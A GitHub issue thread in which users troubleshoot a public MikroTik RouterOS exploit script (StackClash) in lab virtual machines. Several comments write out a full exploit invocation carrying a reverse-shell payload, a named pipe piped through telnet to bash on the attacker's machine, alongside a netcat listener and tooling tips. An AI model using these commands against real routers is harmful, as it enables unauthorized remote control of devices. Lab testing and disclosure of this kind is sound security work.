-
Notifications
You must be signed in to change notification settings - Fork 217
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cannot get shell -> Miktotik 6.37.5 #25
Comments
If you are testing RouterOS in a VM then you have to use the x86 version only. |
Thank you for the reply, I was trying both MIPS and x86 before. Now I am just trying the x86 as per your guidance. I also am running it by just calling the script rather than specifying a version of python. I am able to see webfig from Kali in Firefox. I did extract the correct www using ./getROSbin.py 6.37.5 x86 /nova/bin/www www_binary. On one shell in Kali I ran nc -l -p 4444 On the other shell on Kali I ran ./StackClash_x86.py {Mikrotik IP} 80 www_binary "/bin/mknod /ram/f p; /bin/telnet {Kali IP} 4444 < /ram/f | /bin/bash > /ram/f 2>&1" |
If you use '/nova/bin/info "/system reboot" ' as StackClash command |
I tried ./StackClash_x86.py {Mikrotik IP} 80 www_binary "nova/bin/info '/system reboot'" and the router did not reboot sadly. |
So you have to root your vm and debug it |
I completely understand. Thank you for your time BigNerd95. |
Thank you for understanding |
Sounds like a plan 👍 :) |
do will work with /getROSbin.py 5.21 x86 /nova/bin/www www_binary 5.21 x86 or only version 6.x |
I didn't test version 5.x |
still have problem in kali 64 Traceback (most recent call last): please can help me |
Google it |
@beeterman you need to download the ropper module from GitHub and extract it to folder with stackclash script. This is the easiest way at least. |
|
Yes or that haha. |
finally and run ./StackClash_mips.py mikrotik ip 80 www_binary "/bin/mknod /ram/f p; /bin/telnet kali ip 4444 < /ram/f | /bin/bash > /ram/f 2>&1" what problem err sending ? |
Mmmm |
@N0ur5 I tried 6.37.2 and 6.37.3 and it is working. |
@BigNerd95 really, with version 6.37.5 (x86) not working |
I know |
Maybe it isnt working on all other bugfix versions too |
@BigNerd95 |
I tried 6.38.4 X86 which is installed on VM. On one shell On another shell I ran what's wrong? |
Nothing |
In the shell where you see
|
Thank you!! |
If i don't want to update my Router iso, there is anyway to fix the bug?? |
Disable www service |
root@kali:~/Desktop/Chimay-Red-master/tools# python3 getROSbin.py 5.26 mipsbe /nova/bin/www www_5.26-mipsbe Is there any way to get www binary from RouterOS 5.26 both x86 and mipsbe ? |
Hello,
I am new to GitHub with minimal development/"programming" experience, so my apologies if this is not the correct approach to getting help with this.
I can't seem to get a meterpreter shell or get a callback to netcat(nc), using the notes you provided with this exploit/POC.
I downloaded and installed the firmware for Mikrotik 6.37.5 onto a virtual machine. I have ensured port 80 is open on the device. I am also running Kali on another virtual machine. The devices can ping each other.
I have tried mips and x86 exploits and although the results in the terminal tell me that the exploit was complete, and payload delivered, I do not get a callback to either metasploit handler or netcat. I have tried both python 2.7 as well as 3.6. When I use TCPdump from Kali to get some additional information when running the exploit, I see my machine reach out to the Mikrotik and at one point a HTTP 200 OK message. So I know the initial conversation between the machines opens up. Not long after the payload is sent I see two responses from the Mikrotik. One is a HTTP 400 bad request, and the other is HTTP 500 internal server error.
I seem to be stuck. Is there any guidance or advice you can provide? Is this version perhaps not vulnerable dispite the release notes saying versions up to 3.38.4 are vulnerable? Or maybe I'm doing something wrong? I can provide more information if needed as well. I just would appreciate help as I love researching things in the cybersecurity, pentesting, and hacking.
Thank you very much for your time,
N0ur5
The text was updated successfully, but these errors were encountered: